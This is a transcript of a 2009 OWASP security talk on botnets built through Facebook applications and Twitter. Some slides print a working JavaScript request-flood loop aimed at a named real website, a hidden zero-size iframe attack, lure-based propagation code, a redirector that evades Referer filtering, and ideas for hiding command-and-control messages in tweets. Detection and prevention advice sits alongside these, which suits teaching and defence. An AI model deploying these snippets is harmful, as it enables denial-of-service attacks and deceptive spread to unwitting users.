Facebook, Twitter and Botnets - PowerPoint PPT Presentation

Slides: 34
Provided by: Sul94
Transcript and Presenter's Notes


1
Facebook, Twitter and Botnets
  • OWASP Turkey Chapter
  • September 26 2009
  • Istanbul

2
Botnet
  • Collection of software robots, or bots, that run
    autonomously and automatically
  • Botnet in its simplest form is an army of
    compromised computers that take orders from a
    botherder
  • Botnets are arguably the biggest threat that the
    Internet community has faced
  • Most popular botnet type: IRC channel based
    botnets
  • Lately: social networking site based botnets

3
Puppetnet
  • Puppetnets rely on websites that coerce web
    browsers to participate in malicious activities
  • Such activities include
      • distributed denial-of-service
      • worm propagation
      • reconnaissance probing
  • Puppetnets exploit the high degree of flexibility
    granted to the mechanisms comprising the web
    architecture
  • A website under the control of an attacker can
    thereby transform a collection of web browsers
    into a distributed system that is effectively
    controlled by the attacker
  • Puppetnets can instruct any web browser to engage
    in malicious activities

4
Puppetnet
  • Participation in puppetnets is dynamic
  • Users join and participate unknowingly while
    surfing the net
  • Easy to maintain a reasonable population, without
    the burden of having to look for new victims
  • Harder for the defenders to track and filter out
    attacks, as puppets are likely to be relatively
    short-lived
  • Only indirectly misuse browsers to attack third
    parties
  • http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pdf

5
Puppetnet Diagram
HTTP requests and responses, also carrying the attack commands
Attack traffic
Victim site
6
What can be done via Puppetnets
  • Image Reference
  • Loading image objects through Javascript
  • Open up pop-up Windows
  • Creation of Frames to load remote objects
  • No browser imposes restrictions on the location
    or type of the target referenced through these
    mechanisms

7
Puppetnet DDoS
Firepower of a DDoS attack = number of users
concurrently viewing the malicious page in their web
browser × amount of bandwidth each of these users can
generate towards the target server

  • What is more important?
  • Size of the puppetnet?
  • Sufficient firepower for a typical DDoS scenario?
  • Determine how much traffic a browser can
    typically generate under the attacker's command

8
Facebook
  • Facebook is a global social networking website
    that is operated and privately owned by Facebook,
    Inc.
  • Users can
  • add friends
  • send them messages
  • update their personal profiles to notify friends
    about themselves
  • join networks organized by city, workplace,
    school, and region

9
Application Development in Facebook
  • Options while creating Facebook applications
  • Option 1: Port an existing application to
    Facebook by using an iframe
  • Option 2: Develop an application by using FBML,
    FBJS, FQL and the FB API
  • Create an application in Facebook
  • Facebook API
  • Facebook Markup Language (FBML)
  • Facebook Query Language (FQL)
  • Facebook JavaScript (FBJS)

10
Facebook Application (How does it work?)
  • Callback metaphor to interact with applications
  • The URL of the developer's server is registered
    with the application in Facebook
  • When the Facebook application URL is requested,
    Facebook redirects the request to that server
  • The application processes the request,
    communicates with Facebook using the Facebook
    Application Programming Interface (API) or
    Facebook Query Language (FQL)
  • Returns Facebook Markup Language (FBML) to
    Facebook for presentation

11
Facebook Dynamics
  • FaceBook API
  • Web services programming interface for accessing
    core services
  • profile
  • friends
  • group
  • event
  • photo
  • Performs other Facebook-centric functionality
  • log in
  • redirect
  • update view
  • Facebook Markup Language (FBML)
  • HTML-like language
  • Display pages inside of the Facebook canvas

12
Facebook Dynamics
  • Facebook Query Language (FQL)
  • SQL-based interface into Facebook data.
  • Similar to standard SQL
  • Access many Facebook database tables
  • user
  • friend
  • group
  • group_member
  • event
  • event_member
  • photo
  • album
  • photo_tag
  • Restrictions
  • SELECT statements must be performed one table at
    a time
  • Join queries are not permitted
  • Queries must be indexable.

13
Facebook Dynamics
  • Facebook Javascript (FBJS)
  • Allows limited scripting functionality
  • Alternative DOM implementation
  • Similar to Standard JavaScript
  • Differs from standard JavaScript
  • While accessing a JavaScript property (such as
    document.href), FBJS uses a pair of get and set
    methods instead (getHref, setHref)
  • While processing scripting code inside of script
    elements, tacks on the application ID to function
    and variable names
  • Prevents running arbitrary JavaScript
  • FBJS is transformed on the fly into JavaScript as
    the page is loaded
  • All variables and functions are prefixed with a
    string like "xyz3455679_" (the application ID)
  • Restriction on what can be done with DOM elements
  • Avoids cross-site-scripting attacks and hostile
    user behavior

14
Facebook Platform
  • Standards-based programming framework
  • Enables developers to create applications that
    interact and integrate with core Facebook
    services
  • Facebook applications are not installed directly
    onto the Facebook server. Instead, they are
    placed on the developer's server
  • Facebook applications are called by Facebook when
    the application URL is requested

15
Facebook Application Diagram (How does it work?)
16
What kind of a Facebook Application?
  • A simple application?
  • A popular application?
  • Game or Utility?
  • Fan based Program?
  • Continuous Usage?
  • A program that creates Programs?
  • TOS?

17
Facebook-TOS
  • http://www.facebook.com/terms.php
  • Privacy
  • Sharing Your Content and Information
  • Safety
  • Registration and Account Security
  • Protecting Other People's Rights
  • Mobile
  • Payments
  • Special Provisions Applicable to Share Links
  • Special Provisions Applicable to
    Developers/Operators of Applications and Websites
  • About Advertisements on Facebook
  • Special Provisions Applicable to Advertisers
  • Special Provisions Applicable to Pages

18
Facebook - TOS - Safety
  • Safety
  • You will not upload viruses or other malicious
    code.
  • You will not collect users' content or
    information, or otherwise access Facebook, using
    automated means (such as harvesting bots, robots,
    spiders, or scrapers) without our permission.
  • You will not use Facebook to do anything
    unlawful, misleading, malicious, or
    discriminatory.
  • You will not do anything that could disable,
    overburden, or impair the proper working of
    Facebook, such as a denial of service attack.

19
Facebook - TOS - Provisions Applicable to Developers
  • Special Provisions Applicable to
    Developers/Operators of Applications and Websites
  • You will only request data you need to operate
    your application.
  • You will not use, display, or share a user's data
    in a manner inconsistent with the user's privacy
    settings.
  • You will delete all data you received from
    Facebook if we disable your application or ask
    you to do so.

20
Facebook Revocation Email
21
Botnet Creation in Facebook
  • Image Reference
  • Inline linking
  • Use of a linked object (usually an image) from one
    site inside a web page belonging to a second site
  • The second site is said to have an inline link to
    the site where the object is located
  • When a web site is visited
  • The browser first downloads the textual content in
    the form of an HTML document
  • The downloaded HTML document may call for other
    HTML files to be processed
  • It also permits absolute URLs that refer to
    images hosted on other servers:
      <img src="http://www.example.com/picture.jpg" />
  • When a browser downloads an HTML page containing
    such an image, the browser will contact the
    remote server to request the image content

22
Botnet Creation in Facebook
  • Image Reference
  • A single line like
      echo "<fb:iframe frameborder=\"0\" width=0px height=0px src=\"http://www.w3schools.com/js/venus.jpg\" />";
  • Good enough to create a DDoS attack on the src
    victim site, w3schools.com in the above example
  • An iframe which downloads an image with a width
    and height set to 0px
  • The browser fetches the page above and does not
    show it
  • Change width and height and see the picture

23
Botnet Creation in Facebook
  • How to create a large number of requests to the
    target site?
  • Embed a sequence of image references in the
    malicious webpage, which can be done using either
    a sequence of IMG SRC instructions or
  • a JavaScript loop that instructs the browser to
    load objects from the target server
  • Loading image objects through JavaScript:
      <SCRIPT>
      pic = new Image(10,10);
      function DDOS() {
        var now = new Date();
        pic.src = 'http://www.w3schools.com/js?' + now.getTime();
        setTimeout("DDOS()", 10);
        return;
      }
      </SCRIPT>
      <IFRAME name='parent' width="0" src="page.htm" onLoad="DDOS()">
      </IFRAME>

24
Propagation of Facebook Botnet
  • Create an application
  • Make it nice and fun! (Really important)
  • Advertise it by using Facebook features
  • News Feed
  • Invitation (limit 20 a day)
      $invite_text = htmlentities($invite_text);
      echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST' invite='true' >";
      echo "<fb:multi-friend-selector showborder='true' max='20' actiontext='Kim Silmis programi ile sizi arkadas listesinden silenleri görmek ister misiniz?' exclude_ids='$exclude_list' >";
      echo "</fb:request-form>";
  • Notification
      // $friends1 holds the recipient user ids
      $facebook->api_client->notifications_send($friends1, 'Kim silmis kullaniyor. Siz de <a href="http://apps.facebooks.com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz. ');

25
Detection of Facebook Botnet
  • Victim host must filter out all incoming traffic
    introduced by Facebook users
  • Use the Referer field of the HTTP requests
  • Determine whether a request originates from
    facebook.com or not
  • Stop the attack traffic accordingly
  • Possible for a Facebook application developer to
    overcome this situation by routing the image
    request through a page on another host
      src=http://attack-host/dummy-page?ref=victim-host/image1.jpg
      <?php
      if ($_GET["ref"]) $ref = $_GET["ref"];
      print("<meta http-equiv=refresh content=\"0; url=$ref\">");
      ?>
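As an added example (not from the presentation), the Referer-based filtering from this slide applied to constructed access-log lines, together with a distinct-client count that still flags the image when the Referer has been lost or replaced by the redirector trick shown above. The host names victim-host.example and attack-host.example and the sample log lines are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

OWN_HOSTS = {"victim-host.example"}   # assumption: the host being defended
SOCIAL_SUFFIXES = ("facebook.com",)   # the referer domain the slide filters on
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')   # combined format

def classify(line):
    """Return (client_ip, image_path, label) for an image request, else None.
    label: 'own' = our site, 'social' = facebook.com, 'foreign' = other host
    (e.g. a redirector), 'none' = no Referer, as left by a meta-refresh hop."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0]          # drop cache-busting query strings
    if not path.lower().endswith(IMAGE_EXT):
        return None
    ref = m["referer"]
    host = (urlsplit(ref).hostname or "").lower() if ref not in ("", "-") else ""
    if host in OWN_HOSTS:
        label = "own"
    elif any(host == s or host.endswith("." + s) for s in SOCIAL_SUFFIXES):
        label = "social"
    else:
        label = "foreign" if host else "none"
    return m["ip"], path, label

def hotlink_report(lines, min_clients=3):
    """Count image requests per (path, label); flag paths fetched by at least
    min_clients distinct clients whose Referer is not one of our own pages."""
    counts, clients = Counter(), defaultdict(set)
    for line in lines:
        rec = classify(line)
        if rec is None:
            continue
        ip, path, label = rec
        counts[(path, label)] += 1
        if label != "own":
            clients[path].add(ip)
    flagged = sorted(p for p, ips in clients.items() if len(ips) >= min_clients)
    return counts, flagged

SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.1 - - [26/Sep/2009:10:00:01 +0300] "GET /image1.jpg?123 HTTP/1.1" 200 5120 "http://apps.facebook.com/someapp/" "Mozilla/5.0"',
    '10.0.0.2 - - [26/Sep/2009:10:00:01 +0300] "GET /image1.jpg?124 HTTP/1.1" 200 5120 "http://www.facebook.com/" "Mozilla/5.0"',
    '10.0.0.3 - - [26/Sep/2009:10:00:02 +0300] "GET /image1.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [26/Sep/2009:10:00:02 +0300] "GET /image1.jpg HTTP/1.1" 200 5120 "http://attack-host.example/dummy-page" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Sep/2009:10:00:03 +0300] "GET /logo.png HTTP/1.1" 200 900 "http://victim-host.example/index.html" "Mozilla/5.0"',
]
```

With the sample above, `hotlink_report(SAMPLE_LOG)` flags `/image1.jpg` (four distinct clients, none referred from our own site) while the own-site `/logo.png` fetch is left alone.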

26
Prevention of Facebook Botnet
  • Social network providers should be careful with
    the use of client side technologies, like
    JavaScript, etc.
  • Social network operator should provide developers
    with a strict API, which is capable of giving
    access to resources only related to the system.
  • Applications should run in an isolated
    environment imposing constraints to prevent the
    application from interacting with other Internet
    hosts
  • Facebook Platform can cancel the use of the
    fb:iframe tag, as this tag is used to load images
    hosted at the victim host.

27
Facebook PoC Facebot
  • http://www.ics.forth.gr/dcs/Activities/papers/facebot.isc08.pdf

28
Twitter
  • Free social networking and micro-blogging service
  • Enables users to send and read messages known as
    tweets
  • Tweets are text-based posts of up to
    140 characters displayed on the author's profile
    page and delivered to the author's followers
  • Senders can restrict delivery to those in their
    circle of friends or allow open access

29
Twitter
  • Profile (Name, Location, Bio)
  • Find People (Twitter, Other Networks, Emails,
    Suggested Users)
  • @
  • RT
  • Direct Message
  • http://search.twitter.com
  • Favorites
  • RSS

30
Twitter Botnet?
  • Reasons
  • Ability to hide random commands in the large
    amount of data that is generated each day
  • A really good API that would make integration
    easy
  • Ideas
  • Option 1: A protected Twitter account that only
    the bots could read.
  • Restriction on who could see the commands?
  • Easy for Twitter to block the user
  • PoC supposedly exists
  • Option 2: Send commands to random accounts and
    then have the bot use the search feature to find
    the commands.
  • Harder for Twitter to block the messages as the
    commands could be posted from any account to any
    other account.
  • Bot would have to have a way to spot the commands
    in the general mess of other tweets out there.
  • If the bot can spot the commands then Twitter
    could also do the same matching and automatically
    drop those tweets.
  • Use seemingly innocent commands, such as "check
    out this link ..." instead of saying download a
    file
  • Innocent commands would be hard for Twitter to
    block without upsetting legitimate users
  • Additional Suggestions
  • Using TinyURL to obfuscate commands
  • Using hash tags to represent certain things
  • Making bots to follow certain accounts to mark
    themselves as bots.

31
Twitter - POC
  • Proof of Concept bot which uses Twitter as its
    Command and Control channel at
    http://www.digininja.org/projects/kreiosc2.php
  • Waiting for the Defcon 2009 video presented by
    Kevin Johnson and Tom Eston

32
Thank You
  • Ibrahim Halil Saruhan
  • Facebook halilsaru@gmail.com
  • E-Mail ibrahimsaruhan@gmail.com

33
Questions
  • ?